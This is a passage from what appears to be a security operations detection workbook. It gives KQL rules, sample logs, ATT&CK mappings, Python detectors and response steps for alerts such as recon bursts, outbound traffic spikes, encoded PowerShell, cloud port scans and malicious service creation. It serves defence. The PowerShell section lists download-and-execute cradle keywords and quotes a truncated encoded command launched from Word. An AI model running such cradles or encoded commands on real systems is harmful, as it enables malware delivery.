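def parse_ts(value):
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ")


def classify(command_line):
    """Map a raw command line to the recon command it runs, or None.
    Strips directories, quotes and .exe; 'net' is classified by its subcommand."""
    tokens = command_line.strip().lower().split()
    if not tokens:
        return None
    exe = tokens[0].strip('"')
    exe = re.sub(r"^.*[\\/]", "", exe)        # drop the directory
    exe = re.sub(r"\.exe$", "", exe)          # drop the extension
    if exe == "net" and len(tokens) > 1:      # "net user" vs "net use" etc.
        exe = "net " + tokens[1]
    return exe if exe in RECON else None


def detect_bursts(events, window=timedelta(minutes=5), min_count=5, min_unique=4):
    """Sliding window per (device, user): alert once when at least min_count recon
    commands, with at least min_unique distinct ones, fall inside `window`."""
    by_key = {}
    for e in sorted(events, key=lambda x: x["TimeGenerated"]):
        cmd = classify(e["CommandLine"])
        if cmd:
            key = (e["DeviceName"], e["UserName"])
            by_key.setdefault(key, []).append((parse_ts(e["TimeGenerated"]), cmd))

    alerts = []
    for (device, user), items in by_key.items():
        start = 0
        for end in range(len(items)):
            while items[end][0] - items[start][0] > window:
                start += 1                     # slide the window forward
            run = items[start:end + 1]
            distinct = sorted({cmd for _, cmd in run})
            if len(run) >= min_count and len(distinct) >= min_unique:
                alerts.append({"device": device, "user": user,
                               "first": run[0][0].isoformat(), "last": run[-1][0].isoformat(),
                               "count": len(run), "commands": distinct,
                               "Alert": "Multiple discovery commands executed in short time window"})
                break                          # one alert per device/user is enough
    return alerts


if __name__ == "__main__":
    for alert in detect_bursts(EVENTS):
        print(alert)
```

The ENG-PC47 sequence trips the rule on the fifth command, 47 seconds after the first; the finance user never accumulates more than one command in any window. Note that `classify` returns `None` for `net use`, so share mapping does not inflate the count.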
Threat Behavior Indicators
• More than 4 different recon commands executed within ~5 minutes
• User or device has no prior history of admin or pen-test activity
• Scripted enumeration (example, batch file or PowerShell wrapper)
• Occurs shortly after an initial compromise (phishing, exploit, etc.)
Response Actions
1. Check if the user or script was authorised (red team, IT admin, EDR scan)
2. Quarantine the endpoint if activity appears malicious
3. Check for follow-up activity: lateral movement, credential access
4. Correlate with file drops, outbound connections or scheduled tasks
5. Alert on recon toolkits (example, PowerView, SharpView, BloodHound collector)
6. Use endpoint hardening to limit recon commands via AppLocker or audit mode
35. Alert Name: Unusual Spike in Outbound Network Traffic Volume
Alert Logic
Objective: Detect abnormal increases in outbound data transfers that may indicate data
exfiltration, C2 activity or malware beaconing, especially if the volume exceeds the
user's or device's normal baseline.
Data Sources:
• NetFlow / IPFIX logs
• Firewall logs (example, Palo Alto, Fortinet, Cisco ASA)
• EDR with network telemetry
• NDR (Network Detection and Response) solutions
Detection Logic (KQL – Volume Anomaly with Baseline):
NetworkTraffic
| where Direction == "Outbound" and TimeGenerated > ago(1h)
| summarize TotalBytesSent = sum(BytesSent) by DeviceName, bin(TimeGenerated, 1h)
| join kind=inner (
    BaselineOutboundTraffic
    // baseline must be an average of hourly totals, not of individual flows
    | summarize HourlyBytes = sum(BytesSent) by DeviceName, bin(TimeGenerated, 1h)
    | summarize AvgBytesSent = avg(HourlyBytes) by DeviceName
) on DeviceName
| where TotalBytesSent > AvgBytesSent * 5
| extend Alert = "Unusual spike in outbound traffic volume"
Alternative (Threshold-Based):
• Flag any endpoint that sends >500MB within 15 minutes, especially to unknown IPs or domains
MITRE ATT&CK Mapping
Tactic Exfiltration, Command and Control
Techniques T1041 – Exfiltration Over C2 Channel
T1048 – Exfiltration Over Alternative Protocol
T1071 – Application Layer Protocol
Explanation:
A sudden surge in outbound traffic may indicate active data exfiltration, especially when
paired with beaconing, DNS tunneling or large file uploads to cloud services.
NetFlow Log Entry
{
"TimeGenerated": "2025-04-23T06:30:08Z",
"DeviceName": "LEGAL-PC12",
"SourceIP": "10.20.45.32",
"DestinationIP": "185.23.55.212",
"DestinationPort": 443,
"Protocol": "TCP",
"BytesSent": 744812392,
"BytesReceived": 23892,
"Direction": "Outbound",
"SessionDuration": "00:03:05"
}
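The comparison only means something if both sides are in the same units: the current hour is a sum of flows, so the baseline has to be an average of earlier hourly sums, not an average of individual flow sizes (which is far smaller and makes almost every hour a "spike"). The Python below is an added example, not the workbook's own logic: it builds hourly totals from flow records, derives a per-device baseline from the hours before the one under test, applies the 5x multiplier, and reports devices that have no baseline yet rather than silently skipping them. All flows except the workbook's 744 MB sample are constructed.

```python
from collections import defaultdict
from datetime import datetime

MB = 1_000_000


def hour_bin(ts):
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ").replace(minute=0, second=0)


def _flow(ts, device, sent, direction="Outbound"):
    return {"TimeGenerated": ts, "DeviceName": device, "Direction": direction, "BytesSent": sent}


# Constructed prior-day traffic: LEGAL-PC12 sends 4 x 5 MB per hour (20 MB/h),
# HR-PC07 sends 4 x 12 MB per hour (48 MB/h).
FLOWS = []
for hour in ("2025-04-22T09", "2025-04-22T10", "2025-04-22T11", "2025-04-22T12"):
    for minute in ("05", "25", "45", "55"):
        FLOWS.append(_flow(f"{hour}:{minute}:00Z", "LEGAL-PC12", 5 * MB))
        FLOWS.append(_flow(f"{hour}:{minute}:00Z", "HR-PC07", 12 * MB))

# The hour under test: the workbook's NetFlow entry plus constructed noise.
FLOWS += [
    {"TimeGenerated": "2025-04-23T06:30:08Z", "DeviceName": "LEGAL-PC12",
     "DestinationIP": "185.23.55.212", "DestinationPort": 443, "Protocol": "TCP",
     "BytesSent": 744812392, "BytesReceived": 23892, "Direction": "Outbound"},
    _flow("2025-04-23T06:12:00Z", "LEGAL-PC12", 3 * MB),
    _flow("2025-04-23T06:40:00Z", "HR-PC07", 60 * MB),            # a bit above normal, not 5x
    _flow("2025-04-23T06:41:00Z", "NEW-PC99", 900 * MB),          # no history for this host
    _flow("2025-04-23T06:42:00Z", "LEGAL-PC12", 500 * MB, "Inbound"),  # wrong direction
]


def hourly_totals(flows):
    """Sum outbound bytes per (device, hour)."""
    totals = defaultdict(int)
    for f in flows:
        if f.get("Direction") != "Outbound":
            continue
        totals[(f["DeviceName"], hour_bin(f["TimeGenerated"]))] += f["BytesSent"]
    return totals


def baseline_per_device(totals, before):
    """Average of the per-hour totals strictly before `before`, per device."""
    buckets = defaultdict(list)
    for (device, hour), total in totals.items():
        if hour < before:
            buckets[device].append(total)
    return {device: sum(v) / len(v) for device, v in buckets.items()}


def detect_spikes(flows, current_hour, multiplier=5):
    totals = hourly_totals(flows)
    baseline = baseline_per_device(totals, current_hour)
    alerts = []
    for (device, hour), total in sorted(totals.items()):
        if hour != current_hour:
            continue
        avg = baseline.get(device)
        if avg is None:
            # Surface it: a host with no history cannot be judged by ratio.
            alerts.append({"device": device, "status": "no baseline", "bytes": total})
        elif total > multiplier * avg:
            alerts.append({"device": device, "status": "spike", "bytes": total,
                           "baseline": avg, "ratio": round(total / avg, 1),
                           "Alert": "Unusual spike in outbound traffic volume"})
    return alerts


if __name__ == "__main__":
    for alert in detect_spikes(FLOWS, hour_bin("2025-04-23T06:00:00Z")):
        print(alert)
```

LEGAL-PC12 comes out at roughly 37x its 20 MB/h baseline; HR-PC07 at 1.25x stays quiet, and NEW-PC99 is reported as "no baseline" so the threshold-based alternative can take over for it.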
Threat Behavior Indicators
• High volume of traffic over encrypted or non-inspected ports (example, 443, 80, 8080)
• Destination IP is unknown, geolocated in foreign country or flagged in TI feeds
• No corresponding user interaction or scheduled task associated with the transfer
• Occurs outside business hours or from rarely used devices
Response Actions
1. Identify the destination and investigate domain/IP reputation
2. Quarantine the source endpoint if exfiltration is confirmed
3. Check for large file access events or cloud uploads
4. Use DPI or NDR tools to analyse payload type (example, compressed archive, DB dump)
5. Correlate with account behaviour (logins, PowerShell, registry tampering)
6. Implement thresholds and anomaly baselines in SIEM or firewall
36. Alert Name: Unauthorised Access Attempt to Restricted File Shares
Alert Logic
Objective: Detect attempts to access sensitive or restricted file shares (example, HR,
Finance, Legal, IT Admin folders) by users who are not part of the authorised group,
indicating potential insider threat, credential abuse or lateral movement.
Data Sources:
• Windows Security Logs (Event ID 5145 – File share access request)
• File server logs (example, NetApp, Windows File Server)
• EDR with file access telemetry
• SIEM enrichment with AD group membership
Detection Logic (KQL – Share Access + Group Check):
SecurityEvent
| where EventID == 5145
| where ShareName has_any ("\\HR-SHARE", "\\FINANCE-SHARE", "\\IT-ADMINS")
| where AccessMask contains "ReadData" or AccessMask contains "WriteData"
| where SubjectUserName !in (AuthorisedUsersForShare)
| extend Alert = "Unauthorised access attempt to sensitive file share"
Alternate Logic (EDR + File Path):
DeviceFileEvents
| where FolderPath has_any ("\\\\HR-FS\\Confidential", "\\\\FS01\\Finance", "\\\\ADFS\\Sysvol\\GPO")
| where InitiatingProcessAccountName !contains "admin" and InitiatingProcessAccountName !startswith "svc"
MITRE ATT&CK Mapping
Tactic Discovery, Collection
Techniques T1083 – File and Directory Discovery
T1005 – Data from Local System
T1039 – Data from Network Shared Drive
Explanation:
Adversaries may probe shared folders to discover sensitive data or extract valuable files,
especially after gaining domain access or stealing valid credentials.
Windows Security Log (Event ID 5145)
{
"EventID": 5145,
"TimeGenerated": "2025-04-23T06:44:00Z",
"SubjectUserName": "amirah.roslan@company.com",
"ShareName": "\\\\FS-FIN01\\Payroll",
"RelativeTargetName": "2024_salaries.xlsx",
"AccessMask": "ReadData",
"AccessGranted": "False"
}
Threat Behavior Indicators
• Repeated access attempts to restricted folders outside the user’s department
• Access denied events targeting high-value file shares (example, HR, Legal, Sysvol)
• Occurs after lateral movement, group membership changes or MFA bypass
• File paths accessed include keywords: salary, contracts, backup, confidential
Response Actions
1. Alert security team and notify file share owner
2. Review group membership and permission assignments
3. Correlate with user behaviour (logon source, endpoint activity, login time)
4. Enable file access auditing with real-time alerting on critical shares
5. Limit sensitive share visibility using access-based enumeration (ABE)
6. Consider implementing EDR-based file access controls for sensitive paths
37. Alert Name: Endpoint Connection to Known Malware Distribution Domain
Alert Logic
Objective: Detect when an endpoint connects to a domain that is listed in threat
intelligence feeds as associated with malware distribution, including droppers, exploit kits
or ransomware infrastructure.
Data Sources:
• DNS logs (example, Zeek, Infoblox)
• Firewall/proxy logs
• Threat Intelligence feeds (VirusTotal, AlienVault OTX, Palo Alto AutoFocus, BrightCloud)
• EDR with DNS or URL telemetry
Detection Logic (KQL – DNS Log + Threat Intel Enrichment):
DnsLogs
| join kind=inner (
ThreatIntelIndicators
| where IndicatorType == "domain" and ThreatType contains "Malware"
) on $left.QueryName == $right.ThreatIndicator
| project TimeGenerated, DeviceName, QueryName, ThreatType, ConfidenceScore, SourceIP
| extend Alert = "Connection to known malware distribution domain"
Alternate (Proxy or Firewall Logs):
ProxyLogs
| where DestinationDomain in (ThreatIntel.MalwareDomains)
| summarize HitCount = count() by DeviceName, UserName, DestinationDomain
| where HitCount > 0
MITRE ATT&CK Mapping
Tactic Command and Control, Initial Access
Techniques T1102 – Web Service
T1566 – Phishing (leading to malware drop)
T1203 – Exploitation for Client Execution (via drive-by download)
Explanation:
Endpoints contacting known malware sites are likely being targeted in a phishing
campaign, running malware loaders or are already compromised and retrieving second-
stage payloads.
DNS Log Entry (Threat Match)
{
"TimeGenerated": "2025-04-23T07:00:21Z",
"DeviceName": "IT-PC14",
"SourceIP": "10.20.34.61",
"QueryName": "update-checker.security-upgrade[.]com",
"QueryType": "A",
"ThreatIndicator": "update-checker.security-upgrade.com",
"ThreatType": "Malware Distribution",
"ConfidenceScore": 92
}
Threat Behavior Indicators
• High-confidence threat intel match (example, C2 or loader domains)
• Occurs shortly after email link click or browser activity
• Domain was recently registered (low reputation, high risk)
• DNS query not followed by legitimate HTTP/S content download
Response Actions
1. Immediately block the domain/IP at firewall, DNS and proxy
2. Isolate the endpoint and scan for indicators of infection
3. Correlate with email logs or web activity to identify the initial vector
4. Check for second-stage connections, persistence mechanisms or malware implants
5. Use sandbox or threat intelligence to analyse the remote payload
6. Enhance security controls: DNS filtering, web isolation, EDR prevention policies
38. Alert Name: Unusual PowerShell Command Involving Base64 Decoding
Alert Logic
Objective: Detect obfuscated or encoded PowerShell commands, particularly those using
Base64 encoding, which is a common tactic for evasion, initial access or malware
execution.
Data Sources:
• Sysmon (Event ID 1 – Process Creation)
• PowerShell ScriptBlock Logging (Event ID 4104)
• EDR tools with command-line visibility (example, Defender, CrowdStrike, SentinelOne)
Detection Logic (KQL – Process CommandLine Analysis):
DeviceProcessEvents
| where FileName == "powershell.exe"
| where ProcessCommandLine has_any ("-enc", "FromBase64String", "Base64Decode")
| where ProcessCommandLine !contains "Defender" and ProcessCommandLine !contains "DefenderScheduledScan"
| extend Alert = "Suspicious PowerShell command using Base64 encoding"
Alternate Logic (ScriptBlock Logging – Event ID 4104):
SecurityEvent
| where EventID == 4104
| where ScriptBlockText has_any ("FromBase64String", "Invoke-Expression", "IEX", "-enc")
MITRE ATT&CK Mapping
Tactic Execution, Defense Evasion
Techniques T1059.001 – Command and Scripting Interpreter: PowerShell
T1027 – Obfuscated Files or Information
Explanation:
Base64 is frequently used to encode payloads or commands to evade detection from
antivirus, logging tools and static analysis.
Sysmon Log (Event ID 1 – Obfuscated PowerShell)
{
"EventID": 1,
"TimeGenerated": "2025-04-23T07:15:19Z",
"DeviceName": "HR-LAPTOP23",
"UserName": "nurul.amalina@company.com",
"ProcessName": "powershell.exe",
"CommandLine": "powershell.exe -enc JABnAHYAcwAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACA...",
"ParentProcessName": "winword.exe"
}
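Response action 1 (decode and analyse) is mechanical once two facts are fixed: `-EncodedCommand` carries Base64 over UTF-16LE, not UTF-8, and powershell.exe accepts any unambiguous prefix of the switch (`-e`, `-ec`, `-enc`, ...), so a rule that looks only for the literal `-enc` misses the short forms. The Python below is an added example, not the workbook's own logic: it finds the switch in any of its spellings, decodes the blob (tolerating the missing padding and trailing "..." of the truncated sample above), and reports the hidden-window, no-profile and Office-parent context the indicators list calls out. The indicator keyword list and the parent-process set are assumptions.

```python
import base64
import re

# Any unambiguous prefix of "encodedcommand" is accepted by powershell.exe;
# longest alternatives first so "-enc" is not consumed as "-e" + "nc".
_PREFIXES = "|".join("encodedcommand"[:i] for i in range(14, 0, -1))
ENCODED_FLAG = re.compile(r"(?:^|\s)([-/](?:" + _PREFIXES + r"))\s+([A-Za-z0-9+/=]+)",
                          re.IGNORECASE)
HIDDEN = re.compile(r"[-/]w(?:indowstyle)?\s+hidden", re.IGNORECASE)
NOPROFILE = re.compile(r"[-/]nop(?:rofile)?\b", re.IGNORECASE)
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Assumption: a starter list of script content worth flagging after decoding.
SCRIPT_INDICATORS = ("new-object", "net.webclient", "downloadstring", "downloadfile",
                     "invoke-webrequest", "invoke-expression", "iex", "frombase64string")

# The workbook's Sysmon entry; the Base64 blob is truncated with "..." exactly as printed.
SAMPLE = {
    "EventID": 1,
    "TimeGenerated": "2025-04-23T07:15:19Z",
    "DeviceName": "HR-LAPTOP23",
    "UserName": "nurul.amalina@company.com",
    "ProcessName": "powershell.exe",
    "CommandLine": "powershell.exe -enc JABnAHYAcwAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACA...",
    "ParentProcessName": "winword.exe",
}


def decode_encoded_command(blob):
    """Decode an -EncodedCommand argument: Base64 over UTF-16LE.
    Tolerates a truncated blob (missing padding, trailing '...') as seen in tickets."""
    blob = blob.strip().rstrip(".")
    blob += "=" * (-len(blob) % 4)
    raw = base64.b64decode(blob)
    # A truncated blob can end mid-character; drop the dangling byte rather than fail.
    return raw.decode("utf-16-le", errors="ignore")


def analyse_command_line(command_line, parent_process=None):
    """Return what an analyst needs from one process-creation event."""
    result = {
        "encoded": False, "flag": None, "decoded": None,
        "hidden": bool(HIDDEN.search(command_line)),
        "noprofile": bool(NOPROFILE.search(command_line)),
        "office_parent": (parent_process or "").lower() in OFFICE_PARENTS,
        "indicators": [],
    }
    match = ENCODED_FLAG.search(command_line)
    if match:
        result["encoded"] = True
        result["flag"] = match.group(1)
        try:
            result["decoded"] = decode_encoded_command(match.group(2))
        except ValueError:            # binascii.Error is a ValueError: malformed blob
            result["decoded"] = None
    # Look for indicators in the decoded script if we have one, else in the raw line.
    text = (result["decoded"] or command_line).lower()
    result["indicators"] = [k for k in SCRIPT_INDICATORS
                            if re.search(r"\b" + re.escape(k) + r"\b", text)]
    return result


if __name__ == "__main__":
    print(analyse_command_line(SAMPLE["CommandLine"], SAMPLE["ParentProcessName"]))
```

The truncated sample decodes to the start of an object-creation statement (`$gvs = New-Object`), launched from winword.exe, which is enough to justify the quarantine step before the full script is recovered from ScriptBlock logging (Event ID 4104). In the SIEM rule itself, matching `-e`, `-ec` and the other prefixes closes the gap that a plain `-enc` string match leaves open.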
Threat Behavior Indicators
• Use of -enc or .FromBase64String() in PowerShell commands
• Executed from Office apps, scripting engines or via malicious macros
• Runs from temp folders or AppData, often during early infection phase
• Powershell launched in hidden, non-interactive mode: -nop -w hidden
Response Actions
1. Decode the Base64 string and analyse the payload
2. Quarantine the endpoint if the script is malicious
3. Investigate how the command was triggered (macro, script, external email)
4. Alert on future encoded command usage via Sysmon and PowerShell logs
5. Harden systems using AppLocker, WDAC or PowerShell Constrained Language Mode
6. Educate users on avoiding document macros and suspicious attachments
39. Alert Name: Login with Disabled or Expired User Account
Alert Logic
Objective: Detect any attempt, successful or failed, to authenticate using a disabled or
expired user account, which could indicate privilege escalation, misconfiguration or
unauthorised access attempts.
Data Sources:
• Windows Security Logs (Event ID 4625 – Failed Logon)
• Identity provider logs (Azure AD, Okta, LDAP)
• Domain Controller logs with account status metadata
Detection Logic (KQL – Failed Logon with Status Codes):
SecurityEvent
| where EventID == 4625
| where Status in ("0xC0000071", "0xC0000072", "0xC0000193")
| extend Reason = case(
Status == "0xC0000071", "Password expired",
Status == "0xC0000072", "Account disabled",
Status == "0xC0000193", "Account expired",
"Other"
)
| extend Alert = strcat("Login attempt with ", Reason)
Status Code Reference:
• 0xC0000071 – Password expired
• 0xC0000072 – Account disabled
• 0xC0000193 – Account expired
MITRE ATT&CK Mapping
Tactic Defense Evasion, Initial Access
Techniques T1078.001 – Valid Accounts: Local/Domain Accounts
T1087 – Account Discovery
Explanation:
Attempting to use disabled or expired accounts can signal adversary enumeration or abuse
of dormant credentials, possibly for lateral movement or staging attacks.
Security Log (Event ID 4625 – Failed Logon)
{
"EventID": 4625,
"TimeGenerated": "2025-04-23T07:31:58Z",
"TargetUserName": "support.contractor",
"Status": "0xC0000072",
"FailureReason": "Account currently disabled",
"IpAddress": "192.0.2.110",
"LogonType": 3,
"AuthenticationPackage": "Negotiate",
"WorkstationName": "IT-LAPTOP09"
}
Threat Behavior Indicators
• Repeated attempts using expired contractor or former employee accounts
• Attempts occur outside IT hours or without a password reset request
• Followed by attempts with similar usernames or lateral authentication
• Login source not tied to expected internal assets
Response Actions
1. Confirm that the account was not mistakenly reactivated or synced
2. Correlate with HR and provisioning/de-provisioning systems
3. Check if account had elevated access rights or linked shares/services
4. Search for similar attempts across other dormant accounts
5. Implement automated deactivation and real-time lockout monitoring
6. Alert IT admins on any login attempt from disabled/expired accounts
40. Alert Name: Cloud Workload Performing Port Scanning on Internal Assets
Alert Logic
Objective: Detect a cloud-hosted instance (example, AWS EC2, Azure VM, GCP Compute
Engine) conducting horizontal or vertical port scanning against internal IP ranges, which
often signals reconnaissance or compromise of the cloud workload.
Data Sources:
• VPC flow logs / NSG flow logs / Cloud firewall logs
• NDR/IDS tools (example, Zeek, Suricata, Corelight)
• CSPM/Cloud SIEM (AWS GuardDuty, Azure Defender, GCP SCC)
• Threat intelligence (to enrich IP origin)
Detection Logic (Flow Logs – Port Spread per Source):
CloudFlowLogs
| where SourceType == "CloudInstance" and ipv4_is_private(DestinationIP)
| summarize DistinctPorts = dcount(DestinationPort), TotalConnections = count() by SourceIP, bin(TimeGenerated, 5m)
| where DistinctPorts > 20 and TotalConnections > 50
| extend Alert = "Possible internal port scanning from cloud workload"
Alternate (Vertical Scan Logic – many ports on the same target):
CloudFlowLogs
| where SourceType == "CloudInstance" and ipv4_is_private(DestinationIP)
| summarize UniqueDestPorts = dcount(DestinationPort) by SourceIP, DestinationIP, bin(TimeGenerated, 5m)
| where UniqueDestPorts > 15
ipv4_is_private() covers every RFC 1918 range, whereas a startswith "10." filter misses 172.16/12 and 192.168/16. A true horizontal sweep (one port across many hosts) is counted with dcount(DestinationIP) by SourceIP and DestinationPort rather than with a port count, and approved vulnerability scanners should be excluded by source IP before the alert fires.
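Worked example, added here as an illustration and not part of the original workbook or of any cloud provider's tooling: the port-spread, vertical and horizontal heuristics described above, run in Python over a constructed set of flow records. The record fields mirror the hypothetical CloudFlowLogs schema of the query, the 172.31.x and 10.x addresses and the thresholds are assumptions, and ipaddress.is_private stands in for KQL's ipv4_is_private().

```python
"""Port-scan heuristics over constructed VPC-style flow records (added example)."""
from collections import defaultdict
from datetime import datetime, timedelta
import ipaddress

# Constructed sample flows (not real telemetry). Field names follow the
# hypothetical CloudFlowLogs schema used in the workbook's query.
_BASE = datetime(2025, 4, 23, 7, 45, 0)
_SCAN_PORTS = [21, 22, 23, 25, 53, 80, 110, 135, 139, 143, 389, 443, 445,
               993, 995, 1433, 1521, 3306, 3389, 5432, 5900, 5985, 8080, 8443, 9200]


def _flow(offset_s, src, dst, port, source_type="CloudInstance"):
    return {"TimeGenerated": _BASE + timedelta(seconds=offset_s), "SourceType": source_type,
            "SourceIP": src, "DestinationIP": dst, "DestinationPort": port}


SAMPLE_FLOWS = (
    # vertical scan: one cloud instance probing 25 ports on one internal host
    [_flow(5 * i, "172.31.22.15", "10.10.10.5", p) for i, p in enumerate(_SCAN_PORTS)]
    # horizontal scan: the same instance probing SMB across 60 internal hosts
    + [_flow(130 + 2 * i, "172.31.22.15", f"10.10.20.{i + 1}", 445) for i in range(60)]
    # benign: an app server talking to one database port repeatedly
    + [_flow(3 * i, "172.31.5.9", "10.10.10.8", 5432) for i in range(80)]
    # out of scope: traffic to a public address
    + [_flow(10, "172.31.22.15", "8.8.8.8", 443)]
)


def is_internal(ip):
    """RFC 1918 and other non-global ranges; the KQL equivalent is ipv4_is_private()."""
    return ipaddress.ip_address(ip).is_private


def bucket(ts, minutes):
    """Floor a timestamp to a fixed window, like KQL bin(TimeGenerated, Nm)."""
    return ts.replace(minute=ts.minute - ts.minute % minutes, second=0, microsecond=0)


def _in_scope(f):
    return f["SourceType"] == "CloudInstance" and is_internal(f["DestinationIP"])


def detect_port_spread(flows, window_min=5, min_ports=20, min_conns=50):
    """The workbook's first query: distinct ports and connection count per source per bin."""
    stats = defaultdict(lambda: [set(), 0])
    for f in filter(_in_scope, flows):
        key = (f["SourceIP"], bucket(f["TimeGenerated"], window_min))
        stats[key][0].add(f["DestinationPort"])
        stats[key][1] += 1
    return {k: (len(ports), n) for k, (ports, n) in stats.items()
            if len(ports) > min_ports and n > min_conns}


def detect_vertical(flows, min_ports=15):
    """Vertical scan: many distinct ports from one source to one target."""
    ports = defaultdict(set)
    for f in filter(_in_scope, flows):
        ports[(f["SourceIP"], f["DestinationIP"])].add(f["DestinationPort"])
    return {k: len(v) for k, v in ports.items() if len(v) > min_ports}


def detect_horizontal(flows, min_hosts=20):
    """Horizontal scan: one port from one source across many targets."""
    hosts = defaultdict(set)
    for f in filter(_in_scope, flows):
        hosts[(f["SourceIP"], f["DestinationPort"])].add(f["DestinationIP"])
    return {k: len(v) for k, v in hosts.items() if len(v) > min_hosts}


if __name__ == "__main__":
    print("port spread:", detect_port_spread(SAMPLE_FLOWS))
    print("vertical:", detect_vertical(SAMPLE_FLOWS))
    print("horizontal:", detect_horizontal(SAMPLE_FLOWS))
```

The benign database client never trips any heuristic because it reuses one port, and the public-address flow is dropped by the scope filter; the horizontal count (61 hosts on 445) is the signal that a "distinct ports per source" rule on its own cannot see.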
MITRE ATT&CK Mapping
Tactic Discovery
Techniques T1046 – Network Service Discovery
T1018 – Remote System Discovery
Explanation:
Port scanning is used to map services and systems within the network after gaining a
foothold. When this happens from a cloud instance, it may be misconfigured or
compromised (example, by a threat actor or botnet).
Log Entry (Cloud VPC Flow Log)
{
"TimeGenerated": "2025-04-23T07:45:18Z",
"SourceIP": "172.31.22.15",
"InstanceID": "i-0830e3fbc8812234f",
"Cloud": "AWS",
"DestinationIP": "10.10.10.5",
"DestinationPortsScanned": [21, 22, 23, 80, 135, 139, 445, 8080, 3306],
"TotalConnections": 89,
"Action": "Allow"
}
Threat Behavior Indicators
• Multiple internal ports scanned from a cloud-based asset
• No business justification (example, not a vulnerability scanner or pen-test server)
• Ports associated with RDP, SMB, databases or web servers
• Activity preceded by DNS resolution of internal domains or cloud asset
enumeration
Response Actions
1. Isolate the cloud instance and stop the scanning process immediately
2. Check for signs of compromise (malware, reverse shells, containers)
3. Validate the instance purpose and user/account tied to it
4. Review IAM roles, firewall rules and audit logs for misconfigurations
5. Implement egress control and alerting for high-rate internal scans
6. Use CSPM or agent-based security tools to monitor cloud workloads continuously
41. Alert Name: Abnormal Service Creation with Command-Line Parameters
Alert Logic
Objective: Detect suspicious or unauthorised creation of Windows services that execute
custom or unexpected binaries often used for persistence, privilege escalation or malware
installation.
Data Sources:
• Windows System Log (Event ID 7045 – A new service was installed) and Security Log (Event ID 4697 – A service was installed in the system; requires the "Audit Security System Extension" subcategory)
• Sysmon (Event ID 1 – Process creation, Event ID 13 – Registry value set under HKLM\SYSTEM\CurrentControlSet\Services)
• EDR telemetry
Detection Logic (KQL – Security Event + Filtering):
SecurityEvent
| where EventID == 4697   // 7045 is written to the System log and lands in the Event table, not SecurityEvent
| where ServiceFileName !contains "Microsoft" and ServiceFileName !contains "Windows"
| where ServiceFileName endswith ".exe"
| extend Alert = "New service created with suspicious binary path"
The two keyword exclusions are a weak allowlist (an attacker can drop updater.exe under a folder named Microsoft); a stronger rule matches on user-writable locations such as \Users\, \ProgramData\ and \Temp\ instead.
Alternate Detection (Sysmon – Service Creation via sc.exe):
Sysmon
| where EventID == 1
| where CommandLine matches regex @"(?i)\bsc(\.exe)?\s+create\b"   // "sc create" is far more common than "sc.exe create"
| where CommandLine has_any ("powershell", "cmd", "rundll32") or CommandLine contains ".exe"
| extend Alert = "Suspicious service creation via sc.exe"
MITRE ATT&CK Mapping
Tactic Persistence, Privilege Escalation
Techniques T1543.003 – Create or Modify System Process: Windows Service
(T1050 – New Service is retired in current ATT&CK and is covered by T1543.003)
Explanation:
Creating a new Windows service with custom executable paths allows adversaries to
persist after reboot and often run with elevated privileges under the SYSTEM account.
Security Log (Event ID 7045 – Service Creation)
{
"EventID": 7045,
"TimeGenerated": "2025-04-23T08:00:14Z",
"ServiceName": "UpdateMonitor",
"ServiceFileName": "C:\\Users\\Public\\updater.exe",
"StartType": "auto start",
"AccountName": "LocalSystem"
}
Threat Behavior Indicators
• Executable path outside C:\Program Files or System32 (example, AppData, Public)
• Service name mimics legitimate components (example, UpdateMonitor,
SystemService)
• Linked to suspicious parent process (example, powershell.exe, cmd.exe)
• Account used is LocalSystem or a compromised domain admin
Response Actions
1. Immediately stop and delete the malicious service
2. Extract and analyse the binary at the service path
3. Check for service registry entries and persistence mechanisms
4. Investigate how the service was created (parent process, user context)
5. Apply hardening: restrict service creation via GPO or endpoint policies
6. Enable alerting for all service creation outside whitelisted executables
42. Alert Name: Multiple Endpoint Alerts Triggered Within a Short Time Window (EDR
Storm)
Alert Logic
Objective: Detect an explosive burst of security alerts (example, from EDR, XDR, antivirus)
across multiple endpoints in a short period, indicating a widespread attack, such as
ransomware, worm propagation or malware outbreak.
Data Sources:
• EDR/XDR alert logs (example, Defender for Endpoint, CrowdStrike, SentinelOne,
Cortex XDR)
• SIEM alert/event correlation engine
• AV logs (if integrated)
Detection Logic (KQL – Alert Aggregation Example):
SecurityAlert
| where TimeGenerated > ago(10m)
| summarize AlertCount = count(), UniqueDevices = dcount(CompromisedEntity) by bin(TimeGenerated, 5m), AlertName
| where AlertCount > 25 and UniqueDevices > 10
| extend Alert = "Multiple security alerts triggered in short time (EDR storm)"
CompromisedEntity holds the affected host in the Sentinel SecurityAlert table; if a connector leaves it empty, parse the host out of the Entities column instead.
Alternate Logic (Grouped by Alert Provider or Category):
SecurityAlert
| where AlertSeverity in ("High", "Medium")
| where TimeGenerated > ago(15m)
| summarize AlertBurst = count() by AlertName, ProviderName, bin(TimeGenerated, 5m)
| where AlertBurst > 20
MITRE ATT&CK Mapping
Tactic Execution, Impact, Lateral Movement
Techniques T1486 – Data Encrypted for Impact (ransomware)
T1071 – Application Layer Protocol (C2)
T1569.002 – Service Execution (via lateral tools)
Explanation:
When dozens of high-fidelity alerts appear at once across endpoints, it strongly suggests a
coordinated attack in progress or a rapidly spreading threat (example, ransomware worm,
mass exploitation, mass malware execution).
Correlated EDR Alert Spike
{
"TimeWindow": "2025-04-23T08:05:00Z - 08:10:00Z",
"AlertName": "Suspicious PowerShell with Network Activity",
"AlertCount": 52,
"UniqueDevices": 31,
"DetectedBy": "Microsoft Defender for Endpoint",
"AttackPattern": "Encoded PowerShell, Lateral Movement, Remote Task Creation"
}
Threat Behavior Indicators
• Dozens of endpoints triggering similar high-severity alerts
• Same alert name repeating with slightly different device/user context
• Short burst timeframe (example, 5–10 minutes)
• Alerts aligned with encryption, C2 callbacks, PowerShell or privilege escalation
Response Actions
1. Escalate immediately as a potential active attack or ransomware event
2. Trigger the containment plan: isolate affected endpoints from the network
3. Confirm indicators via triage (hashes, domains, filenames, command lines)
4. Alert threat hunters to begin pivoting across logs for early IOCs
5. Block lateral tools (example, PsExec, WMI) and enforce EDR policies
6. Initiate the full IR (Incident Response) process, including backup restoration and legal/regulatory notification
43. Alert Name: Cloud API Key or Token Misuse From Unusual Location
Alert Logic
